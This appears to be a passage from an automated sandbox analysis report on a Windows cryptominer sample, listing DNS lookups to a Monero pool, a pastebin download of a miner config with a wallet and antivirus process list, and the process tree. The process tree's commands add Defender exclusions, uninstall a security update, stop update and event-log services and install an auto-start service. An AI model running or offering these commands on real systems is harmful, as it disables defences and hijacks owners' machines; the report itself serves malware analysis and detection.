                                                                              Dec 6, 2024 22:46:11.576195002 CET53565281.1.1.1192.168.2.4

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Dec 6, 2024 22:46:10.088865042 CET192.168.2.41.1.1.10x93b8Standard query (0)xmr-eu1.nanopool.orgA (IP address)IN (0x0001)false
                                                                              Dec 6, 2024 22:46:11.438251019 CET192.168.2.41.1.1.10x2f1bStandard query (0)pastebin.comA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Dec 6, 2024 22:46:10.229141951 CET1.1.1.1192.168.2.40x93b8No error (0)xmr-eu1.nanopool.org51.15.58.224A (IP address)IN (0x0001)false
                                                                              Dec 6, 2024 22:46:10.229141951 CET1.1.1.1192.168.2.40x93b8No error (0)xmr-eu1.nanopool.org51.89.23.91A (IP address)IN (0x0001)false
                                                                              Dec 6, 2024 22:46:10.229141951 CET1.1.1.1192.168.2.40x93b8No error (0)xmr-eu1.nanopool.org146.59.154.106A (IP address)IN (0x0001)false
                                                                              Dec 6, 2024 22:46:10.229141951 CET1.1.1.1192.168.2.40x93b8No error (0)xmr-eu1.nanopool.org51.15.65.182A (IP address)IN (0x0001)false
                                                                              Dec 6, 2024 22:46:10.229141951 CET1.1.1.1192.168.2.40x93b8No error (0)xmr-eu1.nanopool.org212.47.253.124A (IP address)IN (0x0001)false
                                                                              Dec 6, 2024 22:46:10.229141951 CET1.1.1.1192.168.2.40x93b8No error (0)xmr-eu1.nanopool.org163.172.154.142A (IP address)IN (0x0001)false
                                                                              Dec 6, 2024 22:46:10.229141951 CET1.1.1.1192.168.2.40x93b8No error (0)xmr-eu1.nanopool.org141.94.23.83A (IP address)IN (0x0001)false
                                                                              Dec 6, 2024 22:46:10.229141951 CET1.1.1.1192.168.2.40x93b8No error (0)xmr-eu1.nanopool.org162.19.224.121A (IP address)IN (0x0001)false
                                                                              Dec 6, 2024 22:46:10.229141951 CET1.1.1.1192.168.2.40x93b8No error (0)xmr-eu1.nanopool.org54.37.232.103A (IP address)IN (0x0001)false
                                                                              Dec 6, 2024 22:46:10.229141951 CET1.1.1.1192.168.2.40x93b8No error (0)xmr-eu1.nanopool.org51.15.193.130A (IP address)IN (0x0001)false
                                                                              Dec 6, 2024 22:46:10.229141951 CET1.1.1.1192.168.2.40x93b8No error (0)xmr-eu1.nanopool.org54.37.137.114A (IP address)IN (0x0001)false
                                                                              Dec 6, 2024 22:46:11.576195002 CET1.1.1.1192.168.2.40x2f1bNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                              Dec 6, 2024 22:46:11.576195002 CET1.1.1.1192.168.2.40x2f1bNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                              Dec 6, 2024 22:46:11.576195002 CET1.1.1.1192.168.2.40x2f1bNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • pastebin.com

                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.449731172.67.19.244436808C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-06 21:46:12 UTC114OUTGET /raw/Cs3YCuXT HTTP/1.1
                                                                              Accept: */*
                                                                              Connection: close
                                                                              Host: pastebin.com
                                                                              User-Agent: cpp-httplib/0.12.6
                                                                              2024-12-06 21:46:13 UTC391INHTTP/1.1 200 OK
                                                                              Date: Fri, 06 Dec 2024 21:46:13 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              x-frame-options: DENY
                                                                              x-content-type-options: nosniff
                                                                              x-xss-protection: 1;mode=block
                                                                              cache-control: public, max-age=1801
                                                                              CF-Cache-Status: EXPIRED
                                                                              Last-Modified: Fri, 06 Dec 2024 21:46:13 GMT
                                                                              Server: cloudflare
                                                                              CF-RAY: 8edf77a81a5203d5-EWR
                                                                              2024-12-06 21:46:13 UTC978INData Raw: 31 35 63 38 0d 0a 7b 0d 0a 20 20 20 20 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 20 20 20 20 22 70 6f 6f 6c 22 3a 20 22 78 6d 72 2d 65 75 31 2e 6e 61 6e 6f 70 6f 6f 6c 2e 6f 72 67 22 2c 0d 0a 20 20 20 20 22 70 6f 72 74 22 3a 20 31 30 33 34 33 2c 0d 0a 20 20 20 20 22 77 61 6c 6c 65 74 22 3a 20 22 38 39 4a 4a 6a 76 6f 62 68 48 62 41 46 74 44 6d 6a 79 47 6b 70 69 43 53 73 41 47 62 6e 6a 6f 77 4e 63 65 46 4b 6b 76 74 50 78 63 64 32 69 54 4d 4a 4a 4e 37 56 59 38 48 47 34 6a 63 35 65 50 6e 6a 4c 43 57 41 64 69 4b 61 72 73 65 68 51 56 34 46 56 51 73 77 56 6a 6a 54 41 7a 36 37 6b 5a 2e 52 49 47 2d 31 2f 59 65 72 65 31 31 22 2c 0d 0a 20 20 20 20 22 70 61 73 73 77 6f 72 64 22 3a 20 22 22 2c 0d 0a 20 20 20 20 22 6e 69 63 65 68 61 73 68 22 3a 20 66 61 6c 73
                                                                              Data Ascii: 15c8{ "algo": "rx/0", "pool": "xmr-eu1.nanopool.org", "port": 10343, "wallet": "89JJjvobhHbAFtDmjyGkpiCSsAGbnjowNceFKkvtPxcd2iTMJJN7VY8HG4jc5ePnjLCWAdiKarsehQV4FVQswVjjTAz67kZ.RIG-1/Yere11", "password": "", "nicehash": fals
                                                                              2024-12-06 21:46:13 UTC1369INData Raw: 65 2c 61 76 67 5f 61 6e 74 69 76 69 72 75 73 5f 66 72 65 65 5f 73 65 74 75 70 2e 65 78 65 2c 41 56 49 52 41 2e 53 50 4f 54 4c 49 47 48 54 2e 42 4f 4f 54 53 54 52 41 50 50 45 52 2e 45 58 45 2c 41 56 49 52 41 2e 53 50 4f 54 4c 49 47 48 54 2e 42 4f 4f 54 53 54 52 41 50 50 45 52 2e 45 52 52 4f 52 52 45 50 4f 52 54 49 4e 47 2e 45 58 45 2c 61 76 69 72 61 5f 72 75 5f 73 70 74 6c 31 5f 31 34 37 38 31 34 36 30 38 33 2d 31 36 35 33 38 39 38 39 38 39 5f 5f 70 68 70 77 73 2e 65 78 65 2c 61 76 69 72 61 5f 72 75 5f 73 70 74 6c 31 5f 31 32 36 31 33 32 36 32 37 38 2d 31 36 36 32 39 37 34 38 37 30 5f 5f 70 61 76 77 73 2e 65 78 65 2c 73 74 61 72 74 75 70 2e 65 78 65 2c 6b 73 34 2e 30 32 31 2e 33 2e 31 30 2e 33 39 31 72 75 5f 32 35 30 30 30 2e 65 78 65 2c 6b 73 34 2e 30 32
                                                                              Data Ascii: e,avg_antivirus_free_setup.exe,AVIRA.SPOTLIGHT.BOOTSTRAPPER.EXE,AVIRA.SPOTLIGHT.BOOTSTRAPPER.ERRORREPORTING.EXE,avira_ru_sptl1_1478146083-1653898989__phpws.exe,avira_ru_sptl1_1261326278-1662974870__pavws.exe,startup.exe,ks4.021.3.10.391ru_25000.exe,ks4.02
                                                                              2024-12-06 21:46:13 UTC1369INData Raw: 53 33 2e 65 78 65 2c 5a 54 53 33 2e 74 6d 70 2c 65 66 70 65 61 64 6d 2e 65 78 65 2c 56 50 4e 47 55 49 2e 65 78 65 2c 43 56 50 4e 44 2e 65 78 65 2c 49 50 53 45 43 4c 4f 47 2e 65 78 65 2c 63 66 70 2e 65 78 65 2c 66 73 64 66 77 64 2e 65 78 65 2c 66 73 67 75 69 65 78 65 2e 65 78 65 2c 62 6c 61 63 6b 64 2e 65 78 65 2c 6b 70 66 34 67 75 69 2e 65 78 65 2c 4d 53 53 43 4c 4c 2e 65 78 65 2c 4d 43 53 48 45 4c 4c 2e 65 78 65 2c 4d 50 46 53 45 52 56 49 43 45 2e 65 78 65 2c 4d 50 46 41 47 45 4e 54 2e 65 78 65 2c 6e 69 73 75 6d 2e 65 78 65 2c 73 6d 63 2e 65 78 65 2c 70 65 72 73 66 77 2e 65 78 65 2c 70 63 63 70 66 77 2e 65 78 65 2c 57 49 4e 53 53 2e 65 78 65 2c 5a 4c 43 4c 49 45 4e 54 2e 65 78 65 2c 4d 43 4f 44 53 2e 65 78 65 2c 4d 43 53 48 49 45 4c 44 2e 65 78 65 2c 6d
                                                                              Data Ascii: S3.exe,ZTS3.tmp,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,m
                                                                              2024-12-06 21:46:13 UTC1369INData Raw: 65 2c 70 65 72 73 66 77 2e 65 78 65 2c 70 63 63 70 66 77 2e 65 78 65 2c 57 49 4e 53 53 2e 65 78 65 2c 5a 4c 43 4c 49 45 4e 54 2e 65 78 65 2c 4d 43 4f 44 53 2e 65 78 65 2c 4d 43 53 48 49 45 4c 44 2e 65 78 65 2c 6d 73 6d 70 65 6e 67 2e 65 78 65 2c 6e 61 76 61 70 73 76 63 2e 65 78 65 2c 61 76 6b 77 63 74 6c 2e 65 78 65 2c 66 73 61 76 33 32 2e 65 78 65 2c 6d 63 73 68 69 65 6c 64 2e 65 78 65 2c 6e 74 72 74 73 63 61 6e 2e 65 78 65 2c 61 76 67 75 61 72 64 2e 65 78 65 2c 61 73 68 53 65 72 76 2e 65 78 65 2c 41 56 45 4e 47 49 4e 45 2e 65 78 65 2c 61 76 67 65 6d 63 2e 65 78 65 2c 74 6d 6e 74 73 72 76 2e 65 78 65 2c 61 64 76 63 68 6b 2e 65 78 65 2c 61 68 6e 73 64 2e 65 78 65 2c 61 6c 65 72 74 73 76 63 2e 65 78 65 2c 61 76 6d 61 69 73 72 76 2e 65 78 65 2c 61 76 73 79
                                                                              Data Ascii: e,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe,advchk.exe,ahnsd.exe,alertsvc.exe,avmaisrv.exe,avsy
                                                                              2024-12-06 21:46:13 UTC499INData Raw: 63 68 2e 65 78 65 2c 62 75 56 73 73 2e 65 78 65 2c 63 6c 74 4c 4d 48 2e 65 78 65 2c 63 6c 74 52 54 2e 65 78 65 2c 63 6f 49 6e 73 74 2e 65 78 65 2c 63 6f 4e 61 74 48 73 74 2e 65 78 65 2c 43 70 79 53 6e 70 74 2e 65 78 65 2c 45 46 41 49 6e 73 74 36 34 2e 65 78 65 2c 65 6c 61 6d 69 6e 73 74 2e 65 78 65 2c 46 4c 44 67 48 6f 73 74 2e 65 78 65 2c 49 6e 73 74 43 41 2e 65 78 65 2c 4d 43 55 49 33 32 2e 65 78 65 2c 4e 61 76 77 33 32 2e 65 78 65 2c 6e 63 6f 6c 6f 77 2e 65 78 65 2c 4e 6f 72 74 6f 6e 53 65 63 75 72 69 74 79 2e 65 78 65 2c 4e 53 63 2e 65 78 65 2c 6e 73 57 73 63 53 76 63 2e 65 78 65 2c 6e 75 50 65 72 66 53 63 61 6e 2e 65 78 65 2c 52 75 6c 65 55 70 2e 65 78 65 2c 53 45 46 49 6e 73 74 2e 65 78 65 2c 53 65 76 6e 74 78 36 34 2e 65 78 65 2c 53 52 54 53 50 5f
                                                                              Data Ascii: ch.exe,buVss.exe,cltLMH.exe,cltRT.exe,coInst.exe,coNatHst.exe,CpySnpt.exe,EFAInst64.exe,elaminst.exe,FLDgHost.exe,InstCA.exe,MCUI32.exe,Navw32.exe,ncolow.exe,NortonSecurity.exe,NSc.exe,nsWscSvc.exe,nuPerfScan.exe,RuleUp.exe,SEFInst.exe,Sevntx64.exe,SRTSP_
                                                                              2024-12-06 21:46:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:16:45:59
                                                                              Start date:06/12/2024
                                                                              Path:C:\Users\user\Desktop\nlGOh9K5X5.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\Desktop\nlGOh9K5X5.exe"
                                                                              Imagebase:0x7ff707f10000
                                                                              File size:7'198'720 bytes
                                                                              MD5 hash:6369AD2A31D25FA131268F312B0C9D03
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:1
                                                                              Start time:16:45:59
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                              Imagebase:0x7ff788560000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:16:45:59
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:4
                                                                              Start time:16:46:03
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                              Imagebase:0x7ff7d0220000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:5
                                                                              Start time:16:46:03
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                              Imagebase:0x7ff6a9f20000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:6
                                                                              Start time:16:46:03
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:7
                                                                              Start time:16:46:03
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:8
                                                                              Start time:16:46:03
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\wusa.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                              Imagebase:0x7ff6be590000
                                                                              File size:345'088 bytes
                                                                              MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:9
                                                                              Start time:16:46:03
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                              Imagebase:0x7ff6a9f20000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:10
                                                                              Start time:16:46:03
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:11
                                                                              Start time:16:46:03
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                              Imagebase:0x7ff6a9f20000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:12
                                                                              Start time:16:46:03
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:13
                                                                              Start time:16:46:04
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop bits
                                                                              Imagebase:0x7ff6a9f20000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:14
                                                                              Start time:16:46:04
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:15
                                                                              Start time:16:46:04
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                              Imagebase:0x7ff6a9f20000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:16
                                                                              Start time:16:46:04
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:17
                                                                              Start time:16:46:04
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                              Imagebase:0x7ff707360000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:18
                                                                              Start time:16:46:04
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                              Imagebase:0x7ff707360000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:19
                                                                              Start time:16:46:04
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                              Imagebase:0x7ff707360000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:20
                                                                              Start time:16:46:04
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:21
                                                                              Start time:16:46:04
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:22
                                                                              Start time:16:46:04
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                              Imagebase:0x7ff707360000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:23
                                                                              Start time:16:46:04
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:24
                                                                              Start time:16:46:04
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe delete "HZIWFEGQ"
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:25
                                                                              Start time:16:46:04
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:26
                                                                              Start time:16:46:04
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:27
                                                                              Start time:16:46:04
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe create "HZIWFEGQ" binpath= "C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exe" start= "auto"
                                                                              Imagebase:0x7ff6a9f20000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:28
                                                                              Start time:16:46:05
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:29
                                                                              Start time:16:46:05
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                              Imagebase:0x7ff6a9f20000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:30
                                                                              Start time:16:46:05
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe start "HZIWFEGQ"
                                                                              Imagebase:0x7ff6a9f20000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:31
                                                                              Start time:16:46:05
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:32
                                                                              Start time:16:46:05
                                                                              Start date:06/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
